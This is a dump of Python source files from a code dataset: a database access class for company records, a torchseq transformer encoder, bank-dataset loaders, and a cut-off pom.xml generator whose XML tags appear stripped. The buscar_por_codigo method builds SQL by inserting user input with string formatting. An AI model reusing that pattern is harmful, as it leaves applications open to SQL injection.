tempresa.emp_fechaautorizacion = fechas.parse_cadena(form.get(\"emp_fechaautorizacion\"))\n tempresa.emp_nroautorizacion = form.get(\"emp_nroautorizacion\")\n self.dbsession.add(tempresa)\n self.dbsession.flush()\n\n tautditdao = 
TAuditDao(self.dbsession)\n tautditdao.crea_accion_insert(enums.TBL_EMPRESA, user_crea, tempresa.emp_id)\n\n def buscar_por_codigo(self, emp_codigo):\n\n sql = \"\"\"select emp_id, \n emp_ruc,\n emp_razonsocial,\n emp_nombrecomercial,\n emp_nroautorizacion,\n emp_fechaautorizacion,\n emp_esquema, \n emp_codigo, \n emp_menu from public.tempresa where emp_codigo = '{0}'\"\"\".format(emp_codigo)\n tupla_desc = ('emp_id',\n 'emp_ruc',\n 'emp_razonsocial',\n 'emp_nombrecomercial',\n 'emp_nroautorizacion',\n 'emp_fechaautorizacion',\n 'emp_esquema',\n 'emp_codigo',\n 'emp_menu')\n return self.first(sql, tupla_desc)\n", "repo_name": "mjapon/sysprintngjs", "sub_path": "fusayal/logica/empresa/empresa_dao.py", "file_name": "empresa_dao.py", "file_ext": "py", "file_size_in_byte": 6136, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "logging.getLogger", "line_number": 17, "usage_type": "call"}, {"api_name": "fusayal.logica.dao.base.BaseDao", "line_number": 20, "usage_type": "name"}, {"api_name": "fusayal.logica.empresa.empresa_model.TEmpresa", "line_number": 31, "usage_type": "argument"}, {"api_name": "fusayal.logica.empresa.empresa_model.TEmpresa.emp_id", "line_number": 31, "usage_type": "attribute"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 33, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 33, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 34, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao.verificar", "line_number": 36, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao", "line_number": 36, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 38, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 40, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 40, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 41, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 46, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 46, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 47, "usage_type": "call"}, {"api_name": "copy.copy", "line_number": 49, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.parse_cadena", "line_number": 55, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 55, "usage_type": "name"}, {"api_name": "fusayal.logica.auditorias.taudit_dao.TAuditDao", "line_number": 58, "usage_type": "call"}, {"api_name": "fusayal.logica.utils.checkcambioutil.valor_cambiado", "line_number": 59, "usage_type": "call"}, {"api_name": "fusayal.logica.utils.checkcambioutil", "line_number": 59, "usage_type": "name"}, {"api_name": "fusayal.logica.utils.enums.TBL_EMPRESA", "line_number": 65, "usage_type": "attribute"}, {"api_name": "fusayal.logica.utils.enums", "line_number": 65, "usage_type": "name"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 70, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 70, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 71, 
"usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao.verificar", "line_number": 74, "usage_type": "call"}, {"api_name": "fusayal.logica.contribuyente.contribuyente_dao.TContribuyenteDao", "line_number": 74, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 76, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 78, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 78, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 79, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 81, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 81, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 82, "usage_type": "call"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 87, "usage_type": "call"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 89, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas.es_nonulo_novacio", "line_number": 91, "usage_type": "call"}, {"api_name": "fusayal.utils.cadenas", "line_number": 91, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 92, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.isvalid", "line_number": 95, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 95, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 96, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.get_str_fecha_actual", "line_number": 99, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 99, "usage_type": "name"}, {"api_name": "fusayal.utils.fechas.es_fecha_a_mayor_fecha_b", "line_number": 101, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 101, "usage_type": "name"}, {"api_name": "fusayal.logica.excepciones.validacion.ErrorValidacionExc", "line_number": 102, "usage_type": "call"}, {"api_name": "fusayal.logica.empresa.empresa_model.TEmpresa", "line_number": 104, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas.parse_cadena", "line_number": 108, "usage_type": "call"}, {"api_name": "fusayal.utils.fechas", "line_number": 108, "usage_type": "name"}, {"api_name": "fusayal.logica.auditorias.taudit_dao.TAuditDao", "line_number": 113, "usage_type": "call"}, {"api_name": "fusayal.logica.utils.enums.TBL_EMPRESA", "line_number": 114, "usage_type": "attribute"}, {"api_name": "fusayal.logica.utils.enums", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "7436602889", "text": "from typing import Dict, Union, Tuple\nimport math\nimport logging\n\nimport torch\nimport torch.nn as nn\nfrom transformers import BartModel, BertModel, RobertaModel, MBartModel\n\nfrom torchseq.models.pooling import MultiHeadedPooling\nfrom torchseq.models.positional_embeddings import PositionalEncoding\nfrom torchseq.utils.tokenizer import Tokenizer\nfrom torchseq.utils.config import Config\nfrom torchseq.utils.functions import initialize_truncated_normal_, init_bert_params\n\nimport torchseq.models.transformer as custom_transformer\n\n\nclass SequenceEncoder(nn.Module):\n global_config: Config\n encoder_config: Config\n tokenizer: Tokenizer\n embeddings: nn.Embedding\n 
encoder: Union[custom_transformer.TransformerEncoder, nn.TransformerEncoder]\n\n def __init__(\n self,\n global_config: Config,\n encoder_config: Config,\n tokenizer: Tokenizer,\n embeddings=None,\n freeze_embeddings=False,\n ):\n super().__init__()\n self.global_config = global_config\n self.encoder_config = encoder_config\n self.tokenizer = tokenizer\n\n # Embedding layers\n if embeddings is not None:\n self.embeddings = embeddings\n self.embeddings.force_device = True # type: ignore # dynamic attr\n elif not encoder_config.get(\"bert_encoder\", False) and encoder_config.get(\"pretrained_encoder\", None) is None:\n self.embeddings = nn.Embedding(\n tokenizer.vocab_size,\n global_config.get_first([\"input_raw_embedding_dim\", \"raw_embedding_dim\"]),\n ).cpu()\n if self.tokenizer.has_embeddings and self.encoder_config.get(\"init_embeds_from_tokenizer\", True):\n self.embeddings.weight.data = self.tokenizer.get_embeddings()\n else:\n if self.encoder_config.get(\"init_embeds_like_bert\", False):\n init_bert_params(self.embeddings)\n else:\n torch.nn.init.xavier_uniform_(self.embeddings.weight.data, gain=1.0)\n # initialize_truncated_normal_(\n # self.embeddings.weight.data, std=1 / math.sqrt(config.decoder.embedding_dim)\n # )\n self.embeddings.weight.requires_grad = not freeze_embeddings\n self.embeddings.cpu()\n self.embeddings.force_device = True # type: ignore # dynamic attr\n\n if self.encoder_config.embedding_dim != global_config.get_first(\n [\"input_raw_embedding_dim\", \"raw_embedding_dim\"]\n ):\n self.embedding_projection = nn.utils.weight_norm(\n nn.Linear(\n global_config.get_first([\"input_raw_embedding_dim\", \"raw_embedding_dim\"]),\n encoder_config.embedding_dim,\n bias=False,\n )\n )\n\n # Encoder/decoders\n self.pretrained_model_slug = None\n if encoder_config.get(\"bert_encoder\", False) or encoder_config.get(\"pretrained_encoder\", None) is not None:\n self.pretrained_model_slug = (\n encoder_config.pretrained_encoder\n if encoder_config.get(\"pretrained_encoder\", None) is not None\n else encoder_config.bert_model\n )\n if \"mbart\" in self.pretrained_model_slug:\n bart_model = MBartModel.from_pretrained(self.pretrained_model_slug)\n self.pretrained_encoder = bart_model.encoder\n del bart_model.decoder\n elif \"bart\" in self.pretrained_model_slug:\n bart_model = BartModel.from_pretrained(self.pretrained_model_slug)\n self.pretrained_encoder = bart_model.encoder\n del bart_model.decoder\n elif \"roberta-\" in self.pretrained_model_slug:\n self.pretrained_encoder = RobertaModel.from_pretrained(self.pretrained_model_slug)\n else:\n # TODO: Make this an AutoModel?\n self.pretrained_encoder = BertModel.from_pretrained(self.pretrained_model_slug)\n\n if encoder_config.get(\"freeze_pretrained\", False):\n self.pretrained_encoder.requires_grad = False\n else:\n self.pretrained_encoder = None\n\n if self.encoder_config.get(\"residual\", False):\n self.encoder_projection = nn.utils.weight_norm(\n nn.Linear(encoder_config.embedding_dim * 2, encoder_config.embedding_dim, bias=False)\n )\n if self.encoder_config.get(\"pre_residual\", False):\n self.token_projection = nn.utils.weight_norm(\n nn.Linear(\n global_config.get_first([\"input_raw_embedding_dim\", \"raw_embedding_dim\"]),\n encoder_config.embedding_dim,\n bias=False,\n )\n )\n\n if self.encoder_config.data.get(\"pre_ln\", False):\n encoder_layer_custom = custom_transformer.TransformerEncoderLayer(\n encoder_config.embedding_dim\n + (0 if self.pretrained_model_slug is not None else global_config.bio_embedding_dim),\n 
nhead=encoder_config.num_heads,\n dim_feedforward=encoder_config.dim_feedforward,\n dropout=global_config.dropout,\n activation=encoder_config.activation,\n )\n encoder_norm = nn.LayerNorm(encoder_config.embedding_dim)\n self.encoder = custom_transformer.TransformerEncoder(\n encoder_layer_custom, encoder_config.num_layers, encoder_norm\n )\n else:\n encoder_layer = nn.TransformerEncoderLayer(\n encoder_config.embedding_dim,\n nhead=encoder_config.num_heads,\n dim_feedforward=encoder_config.dim_feedforward,\n dropout=global_config.dropout,\n activation=encoder_config.activation,\n batch_first=True,\n )\n encoder_norm = nn.LayerNorm(encoder_config.embedding_dim)\n self.encoder = nn.TransformerEncoder(\n encoder_layer, encoder_config.num_layers, encoder_norm, enable_nested_tensor=True\n )\n\n if self.encoder_config.get(\"init_like_bert\", False):\n init_bert_params(self.encoder)\n\n # Position encoding\n self.positional_embeddings = PositionalEncoding(encoder_config.embedding_dim)\n\n def forward(\n self,\n input_seq: torch.Tensor,\n input_seq_len: torch.Tensor,\n memory: Dict[str, torch.Tensor],\n include_position: bool = True,\n ) -> Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n max_input_len = input_seq.shape[1]\n device = input_seq.device\n\n # Set up some masks\n src_mask = torch.zeros(max_input_len, max_input_len, dtype=torch.bool).to(input_seq.device)\n # is_causal = False # ready for pt2\n\n if self.global_config.directional_masks:\n src_mask = src_mask.logical_not().triu_(diagonal=1)\n # is_causal = True\n\n if self.encoder_config.data.get(\"attention_limit\", None) is not None:\n raise Exception(\"attention_limit no longer supported!\")\n src_mask = torch.tril(src_mask, diagonal=self.encoder_config.data.get(\"attention_limit\", 0))\n\n if self.encoder_config.data.get(\"no_diagonal_attn\", False):\n raise Exception(\"no_diagonal_attn no longer supported!\")\n src_mask += -torch.inf * torch.eye(max_input_len)\n\n padding_mask = (torch.arange(max_input_len)[None, :].cpu() >= input_seq_len[:, None].cpu()).to(\n input_seq.device\n )\n\n memory[\"encoding_mask\"] = padding_mask\n\n if self.pretrained_encoder is None:\n input_toks_embedded = self.embeddings(input_seq.to(self.embeddings.weight.device)).to(device)\n\n if self.encoder_config.embedding_dim != self.global_config.get_first(\n [\"input_raw_embedding_dim\", \"raw_embedding_dim\"]\n ):\n input_toks_embedded = self.embedding_projection(input_toks_embedded)\n\n input_embedded = input_toks_embedded * math.sqrt(self.encoder_config.embedding_dim)\n\n memory[\"seq_embedded\"] = input_embedded.detach()\n\n if include_position:\n input_embedded = self.positional_embeddings(input_embedded)\n\n memory[\"seq_embedded_positioned\"] = input_embedded.detach()\n\n encoding = self.encoder(\n input_embedded,\n # is_causal=is_causal,\n # mask=(None if is_causal else src_mask),\n mask=src_mask,\n src_key_padding_mask=padding_mask,\n ).contiguous()\n\n else:\n # BERT expects a mask that's 1 unmasked, 0 for masked\n bert_padding_mask = (~padding_mask).long()\n\n bert_typeids: Dict = {}\n\n bert_encoding = self.pretrained_encoder(\n input_ids=input_seq.to(input_seq.device), attention_mask=bert_padding_mask, **bert_typeids\n )[0]\n\n if self.encoder_config.get(\"freeze_pretrained\", False):\n bert_encoding = bert_encoding.detach()\n\n if self.encoder_config.num_layers > 0:\n encoding = self.encoder(\n bert_encoding,\n # is_causal=is_causal,\n # mask=(None if is_causal else src_mask),\n mask=src_mask,\n src_key_padding_mask=padding_mask,\n 
).contiguous()\n\n else:\n encoding = bert_encoding\n\n # Include original input?\n if self.encoder_config.get(\"residual\", False):\n encoding = self.encoder_projection(torch.cat([encoding, input_embedded], dim=-1))\n\n if self.encoder_config.get(\"pre_residual\", False):\n input_toks_resid = self.embeddings(input_seq.to(self.embeddings.weight.device)).to(input_seq.device)\n input_toks_resid = self.token_projection(input_toks_resid)\n input_toks_resid = self.positional_embeddings(input_toks_resid)\n encoding = torch.cat([encoding, input_toks_resid], dim=-1)\n\n return encoding, memory\n", "repo_name": "tomhosking/torchseq", "sub_path": "torchseq/models/encoder.py", "file_name": "encoder.py", "file_ext": "py", "file_size_in_byte": 10185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.nn.Module", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 19, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 20, "usage_type": "name"}, {"api_name": "torchseq.utils.tokenizer.Tokenizer", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 23, "usage_type": "name"}, {"api_name": "torchseq.models.transformer.TransformerEncoder", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torchseq.models.transformer", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 23, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 27, "usage_type": "name"}, {"api_name": "torchseq.utils.config.Config", "line_number": 28, "usage_type": "name"}, {"api_name": "torchseq.utils.tokenizer.Tokenizer", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.Embedding", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 43, "usage_type": "name"}, {"api_name": "torchseq.utils.functions.init_bert_params", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.nn.init.xavier_uniform_", "line_number": 53, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 64, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "transformers.MBartModel.from_pretrained", "line_number": 81, "usage_type": "call"}, {"api_name": "transformers.MBartModel", "line_number": 81, "usage_type": "name"}, {"api_name": "transformers.BartModel.from_pretrained", "line_number": 85, "usage_type": "call"}, {"api_name": "transformers.BartModel", "line_number": 85, "usage_type": "name"}, {"api_name": "transformers.RobertaModel.from_pretrained", "line_number": 89, "usage_type": "call"}, {"api_name": "transformers.RobertaModel", "line_number": 89, "usage_type": "name"}, {"api_name": "transformers.BertModel.from_pretrained", "line_number": 92, "usage_type": "call"}, {"api_name": 
"transformers.BertModel", "line_number": 92, "usage_type": "name"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 100, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 100, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 100, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.nn.utils.weight_norm", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 105, "usage_type": "name"}, {"api_name": "torchseq.models.transformer.TransformerEncoderLayer", "line_number": 113, "usage_type": "call"}, {"api_name": "torchseq.models.transformer", "line_number": 113, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 121, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 121, "usage_type": "name"}, {"api_name": "torchseq.models.transformer.TransformerEncoder", "line_number": 122, "usage_type": "call"}, {"api_name": "torchseq.models.transformer", "line_number": 122, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoderLayer", "line_number": 126, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 126, "usage_type": "name"}, {"api_name": "torch.nn.LayerNorm", "line_number": 134, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 134, "usage_type": "name"}, {"api_name": "torch.nn.TransformerEncoder", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 135, "usage_type": "name"}, {"api_name": "torchseq.utils.functions.init_bert_params", "line_number": 140, "usage_type": "call"}, {"api_name": "torchseq.models.positional_embeddings.PositionalEncoding", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 147, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 148, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 149, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 149, "usage_type": "attribute"}, {"api_name": "torch.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "torch.bool", "line_number": 156, "usage_type": "attribute"}, {"api_name": "torch.tril", "line_number": 165, "usage_type": "call"}, {"api_name": "torch.inf", "line_number": 169, "usage_type": "attribute"}, {"api_name": "torch.eye", "line_number": 169, "usage_type": "call"}, {"api_name": "torch.arange", "line_number": 171, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 185, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 206, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 229, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 235, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 151, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 151, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 151, "usage_type": "name"}]} +{"seq_id": "30344271576", "text": "import glob\nimport os\nimport numpy as np\nimport csv\nimport yaml\nimport torch\nfrom data import TabularBankDataset\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\nclass AverageMeter:\n \"\"\"Computes and stores the 
average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\nclass SaveBestModel:\n def __init__(self, save_dir, metric_name, best_metric_val=float('inf'), maximize=True):\n self.best_metric_val = best_metric_val\n self.metric_name = metric_name\n self.save_dir = save_dir\n self.maximize = maximize\n\n def __call__(self, current_val, epoch, model, optimizer, criterion=None):\n if self.maximize:\n if current_val > self.best_metric_val:\n self.best_metric_val = current_val\n print(f\"Best {self.metric_name}: {self.best_metric_val}\")\n print(\n f\"Saving best model for epoch: {epoch + 1} at {self.save_dir}\\n\")\n torch.save({\n \"epoch\": epoch+1,\n \"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": criterion,\n }, \"{}/best_model.pth\".format(self.save_dir))\n else:\n if current_val < self.best_metric_val:\n self.best_metric_val = current_val\n print(f\"Best {self.metric_name}: {self.best_metric_val}\")\n print(\n f\"Saving best model for epoch: {epoch + 1} at {self.save_dir}\\n\")\n torch.save({\n \"epoch\": epoch+1,\n \"model_state_dict\": model.state_dict(),\n \"optimizer_state_dict\": optimizer.state_dict(),\n \"loss\": criterion,\n }, \"{}/best_model.pth\".format(self.save_dir))\n\n\ndef get_config_from_args(arg):\n if arg == \"dummy\":\n return \"configs/dummy.yml\"\n else:\n exit(\"Requested configuration does not exist\")\n\n\ndef load_config(path, template=None):\n with open(path, 'r') as f:\n config = yaml.load(f, Loader=yaml.FullLoader)\n return config\n\n\ndef load_csv_to_pandas(datapath=\"./bank-additional-full.csv\", drop_na=True):\n if drop_na:\n df = pd.read_csv(datapath, header=0, sep=';').dropna()\n else:\n df = pd.read_csv(datapath, header=0, sep=';', na_values=\"unknown\")\n return df\n\n\ndef create_dataloaders(path=\"./bank_additional_full.csv\", drop_na=False):\n data = load_csv_to_pandas(drop_na=False)\n if drop_na:\n data = data.dropna()\n train_data, val_data, test_data = split_dataset(data)\n test_data.to_csv(\n \"./saved_models/data2vec_imputation/test_data.csv\", index=False)\n train_data.to_csv(\n \"./saved_models/data2vec_imputation/train_data.csv\", index=False)\n train_set = TabularBankDataset(data=train_data)\n val_set = TabularBankDataset(data=val_data)\n test_set = TabularBankDataset(data=test_data)\n emb_dims_train = train_set.get_emb_dims()\n emb_dims_val = val_set.get_emb_dims()\n emb_dims_test = test_set.get_emb_dims()\n batch_size = 512\n train_loader = torch.utils.data.DataLoader(\n train_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n val_loader = torch.utils.data.DataLoader(\n val_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n test_loader = torch.utils.data.DataLoader(\n test_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return (train_loader, val_loader, test_loader), (emb_dims_train, emb_dims_val, emb_dims_test)\n\n\ndef create_balanced_loaders(path=\"./bank_additional_full.csv\", drop_na=True):\n data = load_csv_to_pandas(drop_na=False)\n yes_data = data[data[\"y\"] == \"yes\"]\n no_data = data[data[\"y\"] == \"no\"]\n N_yes = yes_data.shape[0]\n no_data = no_data.sample(n=N_yes)\n data = pd.concat([yes_data, no_data])\n if drop_na == True:\n data = data.dropna()\n data = 
data.sample(frac=1)\n train_data, val_data, test_data = split_dataset(data)\n test_data.to_csv(\n \"./saved_models/data2vec_balanced_classification/test_data.csv\", index=False)\n train_data.to_csv(\n \"./saved_models/data2vec_balanced_classification/train_data.csv\", index=False)\n train_set = TabularBankDataset(data=train_data)\n val_set = TabularBankDataset(data=val_data)\n test_set = TabularBankDataset(data=test_data)\n emb_dims_train = train_set.get_emb_dims()\n emb_dims_val = val_set.get_emb_dims()\n emb_dims_test = test_set.get_emb_dims()\n batch_size = 512\n train_loader = torch.utils.data.DataLoader(\n train_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n val_loader = torch.utils.data.DataLoader(\n val_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n test_loader = torch.utils.data.DataLoader(\n test_set, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return (train_loader, val_loader, test_loader), (emb_dims_train, emb_dims_val, emb_dims_test)\n\n\ndef load_missing(datapath=\"./bank-additional-full.csv\"):\n df = pd.read_csv(datapath, sep=';',\n na_values='unknown')\n df = df[df.isna().any(axis=1)]\n\n train_set = TabularBankDataset(data=df)\n\n emb_dims_train = train_set.get_emb_dims()\n train_loader = torch.utils.data.DataLoader(\n train_set, batch_size=512, shuffle=True, num_workers=1, drop_last=False)\n\n return train_loader, emb_dims_train\n\n\ndef omniloader(path=\"./bank_additional_full.csv\"):\n data = load_csv_to_pandas()\n dataset = TabularBankDataset(data=data)\n emb_dims = dataset.get_emb_dims()\n batch_size = 512\n dataloader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return dataloader, emb_dims\n\n\ndef test_set_loader(path=\"./saved_models/data2vec_balanced_classification/test_data.csv\"):\n data = pd.read_csv(path)\n dataset = TabularBankDataset(data=data)\n emb_dims = dataset.get_emb_dims()\n batch_size = 512\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=True, num_workers=1, drop_last=False)\n return loader, emb_dims\n\n\ndef split_dataset(dataset):\n N_train = dataset.shape[0]\n N_test = int(N_train * 0.20)\n N_val = int(N_train * 0.30)\n\n # sample the test set\n test_set = dataset.sample(n=N_test)\n # remove test set from train set\n train_set = pd.concat([dataset, test_set]).drop_duplicates(keep=False)\n # sample validation set\n val_set = train_set.sample(n=N_val)\n train_set = pd.concat([train_set, val_set]).drop_duplicates(keep=False)\n return train_set, val_set, test_set\n", "repo_name": "fredbeaupre/STT7335-Project", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 7030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "torch.save", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 57, "usage_type": "call"}, {"api_name": "yaml.load", "line_number": 74, "usage_type": "call"}, {"api_name": "yaml.FullLoader", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 80, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 82, "usage_type": "call"}, {"api_name": "data.dropna", "line_number": 89, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 95, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 96, "usage_type": 
"call"}, {"api_name": "data.TabularBankDataset", "line_number": 97, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 102, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 102, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 104, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 117, "usage_type": "call"}, {"api_name": "data.dropna", "line_number": 119, "usage_type": "call"}, {"api_name": "data.sample", "line_number": 120, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 126, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 127, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 133, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 135, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 135, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 137, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 137, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 143, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 147, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 150, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 150, "usage_type": "attribute"}, {"api_name": "data.TabularBankDataset", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 161, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 161, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 167, "usage_type": "call"}, {"api_name": "data.TabularBankDataset", "line_number": 168, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 171, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 184, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "11100724429", "text": "#!/bin/env python3\n\n\"\"\"Read JSON taken from the stack analysis DB and re-creates pom.xml from the data.\"\"\"\n\nimport sys\nimport json\n\n\ndef print_header():\n \"\"\"Print the header for the pom.xml manifest file.\"\"\"\n print(\"\"\"\n\n 4.0.0\n com.redhat.bayessian.test\n test-app-junit-dependency\n 1.0\n \"\"\")\n\n\ndef print_footer():\n \"\"\"Print the footer for the pom.xml manifest file.\"\"\"\n print(\"\"\"\n \n\"\"\")\n\n\ndef print_dependency(version, groupId, artifactId):\n \"\"\"Add one 